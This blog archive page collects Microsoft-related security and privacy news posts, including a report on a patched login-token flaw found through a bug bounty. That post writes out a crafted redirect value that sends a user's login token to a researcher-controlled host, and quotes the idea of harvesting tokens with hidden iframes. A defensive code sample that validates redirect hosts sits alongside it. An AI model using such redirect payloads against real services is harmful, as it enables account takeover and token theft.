Showing posts with label Microsoft. Show all posts

Wednesday, May 11, 2016

Microsoft Faces Over 10 Million Attacks Everyday: Report


Microsoft servers face 10,000,000 attacks a day

A recent security report from the company reveals that Microsoft’s online infrastructure faces around 10 million breach attempts a day.

With Microsoft account and Microsoft Azure Active Directory services, the company helps regular users as well as corporates by providing them with a central identity.
The Identity Mechanism

The first service, your Microsoft ID (also called a Windows Live ID), is your gateway to services such as Bing, Outlook.com, OneDrive, Windows Phone, Skype, Xbox LIVE, Windows 8.1, Windows 10, and many others.

This ID, once hacked, can cause serious trouble for its owner. The problems range from leakage of personal data on the dark web to theft of important files and resources.

Microsoft’s second service for managing user identities is called Azure Active Directory (AAD) and is a commercial service offered to corporate entities. This service is a single sign-on system that grants users access to thousands of cloud (SaaS) apps such as Office 365, Workday, Box, Google Apps and more.

The company says that 90 percent of the world’s 2,000 largest organizations use Azure Active Directory to manage user access to their cloud services. It also says it has 8.24 million AAD tenants, which in turn manage identities for 550 million users.
Attacks and Defenses

Of the 13 billion authentications per day, almost 10 million are attempts to intrude into someone’s account, the report says.

For Windows Live ID

The company has implemented a multi-layered mechanism for detecting breaches. It is designed to prevent unauthorized access even when the wrong person enters the right credentials.

First, an incorrect-password lockout system prevents user accounts from being brute-forced. Second, a location-based service blocks logins from suspicious locations.
For Azure Active Directory

AAD lets its tenants define additional sign-in policies on top of those offered to Windows Live users, which provides an extra layer of security.



An elaboration of Microsoft’s Security implementation on AAD

“The capabilities […] are combined with other protection algorithms, data feeds from the Microsoft Digital Crimes Unit and the Microsoft Security Response Center, phishing attack data from Outlook.com and Exchange Online, and information acquired by partnering with academia, law enforcement, security researchers, and industry partners around the world to create a comprehensive protection system that helps keep customers’ accounts safe,” the company writes in its report.

But above all, no method is a hundred percent fool-proof. Hence it is always necessary to follow security basics such as choosing a strong password and changing it regularly.

Monday, April 4, 2016

Microsoft Pays $13,000 to Hacker for Finding Authentication Flaw



A security researcher has won a $13,000 bounty from Microsoft for finding a critical flaw in its main authentication system that could allow hackers to gain access to a user's Outlook, Azure and Office accounts.

The vulnerability was uncovered by UK-based security consultant Jack Whitton and is similar to the OAuth CSRF (Cross-Site Request Forgery) flaw in Live.com discovered by Synack security researcher Wesley Wineberg.

The main and only difference between the two is that the flaw discovered by Wineberg affected Microsoft's OAuth protection mechanism, while the one discovered by Whitton affected Microsoft's main authentication system.

Microsoft handles authentication across its online services including Outlook, Azure and Office through requests made to login.live.com, login.windows.net, and login.microsoftonline.com.

For example, when a user browses to outlook.office.com, they are redirected to a login.microsoftonline.com URL that contains a 'wreply' parameter specifying which domain the user wants to access.

How Does the Vulnerability Work?


If the user is already logged in, a POST request is made back to the domain specified in wreply, carrying a login token for the user. The service the user wants to authenticate on consumes that token and logs the user in.

Whitton discovered that the authentication URL is vulnerable to cross-site request forgery (CSRF) attacks, allowing a malicious actor to create a specially crafted URL, which, when accessed by an authenticated user, would send the login token to a server controlled by the attacker.

The legitimate URL looks like this:

https://login.microsoftonline.com/login.srf?wa=wsignin1.0&rpsnv=4&wreply=https%3a%2f%2foutlook.office.com%2fowa%2f&id=260563

And the attacker could set the redirect to this:

https%3a%2f%2foutlook.office.com%252f@poc-ssl.fin1te.net%2fmicrosoft%2f%3f

The expert found that this would cause the login token to be sent to the attacker’s website, which in this case is poc-ssl.fin1te.net: once decoded, everything before the '@' in the URL's authority is treated as user information, so the real host is the attacker's. Using the token, the attacker could have gained complete access to the targeted user’s account.

"The token is only valid for the service that issued it – an Outlook token can not be used for Azure, for example," Whitton noted in his blog post. "But it would be simple enough to create multiple hidden iframes, each with the login URL set to a different service, and harvest tokens that way."

The good news is that Microsoft patched the vulnerability within two days after Whitton reported it to the company on January 24. The company also paid out $13,000 to the researcher as part of its bug bounty program.
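To show the defender's side of the wreply flaw, here is an added example (not code from Whitton's post or from Microsoft) that decodes the two wreply values quoted above, shows how a naive prefix check is fooled by the userinfo ('@') trick, and contrasts it with a validator that parses the URL and compares the actual host against an allowlist. The allowlist and function names are assumptions.

```python
from urllib.parse import unquote, urlsplit

# The two wreply values quoted in the post: the legitimate one and Whitton's PoC.
LEGIT_WREPLY = "https%3a%2f%2foutlook.office.com%2fowa%2f"
ATTACK_WREPLY = "https%3a%2f%2foutlook.office.com%252f@poc-ssl.fin1te.net%2fmicrosoft%2f%3f"

# Assumed allowlist of relying-party hosts; the real service's list is not public.
ALLOWED_HOSTS = {"outlook.office.com"}


def effective_host(wreply_param):
    """Host a browser would actually POST the token to, after one URL-decode.

    Everything before '@' in the authority is userinfo, so
    'https://outlook.office.com%2f@poc-ssl.fin1te.net/...' goes to fin1te.net.
    """
    return urlsplit(unquote(wreply_param)).hostname


def naive_wreply_check(wreply_param: str) -> bool:
    """String-prefix check: the kind of validation the userinfo trick defeats.

    It also accepts look-alikes such as 'https://outlook.office.com.example'.
    """
    return unquote(wreply_param).startswith("https://outlook.office.com")


def strict_wreply_check(wreply_param: str) -> bool:
    """Parse the URL and require the authority to be exactly an allowed host.

    Comparing netloc to hostname rejects any userinfo ('user@') or port, and
    the hostname lookup rejects unknown domains.
    """
    parts = urlsplit(unquote(wreply_param))
    host = parts.hostname
    return (
        parts.scheme == "https"
        and host in ALLOWED_HOSTS
        and parts.netloc.lower() == host
    )


if __name__ == "__main__":
    for label, value in (("legit", LEGIT_WREPLY), ("attack", ATTACK_WREPLY)):
        print(f"{label}: host={effective_host(value)} "
              f"naive={naive_wreply_check(value)} strict={strict_wreply_check(value)}")
```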

Wednesday, January 6, 2016

Microsoft with its ‘Super Spy’ Windows 10 is collecting more data than thought before


The Redmond software giant Microsoft’s Windows 10 is fast becoming the world’s preferred operating system over Windows 7 or 8.1. Despite its continued insistence that Windows 10 isn’t spying on anyone, Microsoft seems to have taken an interest in how much time you spend using its Windows 10 operating system, and it has done little to assure privacy-conscious users that its latest operating system isn’t taking more data than it needs.

To back up its claim, Microsoft updated its privacy policy to clarify how and when the OS makes use of user data. However, with its latest Threshold 2 update, Microsoft is observing how long people use the operating system and sending the data to Redmond.

Microsoft shared its enthusiasm in a blog post filled with data collected from users.

On Monday morning, Yusuf Mehdi, Corporate VP of the Windows and Devices Group, disclosed that Windows 10 was active on over 200 million devices. The main factor contributing to its quick growth is that it is currently offered for free to existing Windows 7 and Windows 8.1 users, so the figure is not really astonishing.
Microsoft felt the need to share some milestones to demonstrate the popularity of Windows 10:
1. People spent more than 11 billion hours on Windows 10 in December 2015.
2. 44.5 billion minutes were spent in Microsoft Edge across Windows 10 devices in December 2015 (0.71 billion hours).
3. Users asked Cortana more than 2.5 billion questions since launch.
4. More than 82 billion photos were viewed in the Windows 10 Photo application.
5. Windows 10 gamers spent over 4 billion hours playing PC games.
6. Gamers have streamed more than 6.6 million hours of Xbox One games to Windows 10 PCs.
7. About 30% more Bing search queries from Windows devices compared to previous versions of Windows.
Definitely, these are interesting statistics, and they could be troubling for many privacy-conscious users.

“The statistics indicate that Microsoft may be collecting more data than initially thought,” writes Martin Brinkmann of ghacks. “While it is unclear what data is exactly collected, it is clear that the company is collecting information about the use of individual applications and programs on Windows at the very least.”

Data collection to a degree is unavoidable, as it occurs on every connected device. What is more bothersome about Windows 10 is that there is no clarity on what data exactly is being collected, and there is no easy way to turn it off.

According to Microsoft, the data collection in Windows 10 is for the greater good. It is being used to make the product work better, and that is certainly true to an extent, as the company collects information about the use of individual applications and programs on Windows to find out how popular an application or operating system feature is.

Still, since Microsoft does not reveal detailed information about what gets collected and to what end, it is something users need to be aware of at the very least. We can only hope that while Microsoft celebrates its 2015 milestones, it looks to become more transparent in 2016.

Monday, December 7, 2015

[Latest] Microsoft Silently Re-Enables Windows 10 Upgrades on Windows 7 and 8.1 PCs


Microsoft's getting ready for the more aggressive upgrade phase of Windows 10 – when the new OS will show up first as optional, and then as recommended download in Windows Update – so the company has recently made some changes to Windows 7 and 8.1 PCs to make sure that more computers get it.
Basically, settings on PCs that were previously configured not to receive the upgrade to Windows 10 have been reset and it appears that one of the updates that Microsoft deployed on Windows 7 and 8.1 PCs keeps checking every day to make sure that no other changes are made to this behavior.

Update being re-offered several times

The information comes from the creator of GWX Control Panel, an application developed to block the upgrade to Windows 10.
"Over Thanksgiving weekend I started getting reports that the Windows Update 'AllowOSUpgrade' setting was getting flipped back on on a number of peoples' PCs, and it keeps re-setting itself at least once a day if they switch it back off," Josh Mayfield was quoted.
In other words, Windows 7 and 8.1 computers can now easily receive the upgrade to Windows 10, and for the moment there doesn't seem to be any way to stop this from happening other than manually refusing the new OS.

It's all being done through recently shipped Windows updates for older versions, and according to Mayfield, the very same update is being re-offered again and again.
"Microsoft has released this update several times," Mayfield continued. "It doesn't change the name of the update, but every version is new, with new binary files."
Starting in early 2016, seeing Windows 10 in Windows Update will be quite normal, as Microsoft changes its strategy and makes it an optional update for everyone. At a later time, the upgrade will become “recommended update,” so it becomes harder to avoid installing Windows 10 if you really wish to keep your computer fully patched.



Monday, October 12, 2015

Microsoft helped the NSA decrypt "Outlook.com Web chat, Hotmail service, and Skype"



Microsoft worked hand-in-hand with the United States government in order to allow federal investigators to bypass encryption mechanisms meant to protect the privacy of millions of users, Edward Snowden told The Guardian.

According to an article published on Thursday by the British newspaper, internal National Security Agency memos show that Microsoft actually helped the federal government find a way to decrypt messages sent over select platforms, including Outlook.com Web chat, Hotmail email service, and Skype.

The documents, which are reportedly marked top-secret, come in the wake of other high-profile disclosures attributed to Snowden since he first started collaborating with the paper for articles published beginning June 6. The United States government has since indicted Snowden under the Espionage Act, and he has requested asylum from no fewer than 20 foreign nations.

“The latest NSA revelations further expose the tensions between Silicon Valley and the Obama administration,” the journalists wrote. “All the major tech firms are lobbying the government to allow them to disclose more fully the extent and nature of their cooperation with the NSA to meet their customers' privacy concerns. Privately, tech executives are at pains to distance themselves from claims of collaboration and teamwork given by the NSA documents, and insist the process is driven by legal compulsion.”

In the case of Microsoft, however, it appears as if the Bill Gates-founded tech company went out of its way to assist federal investigators.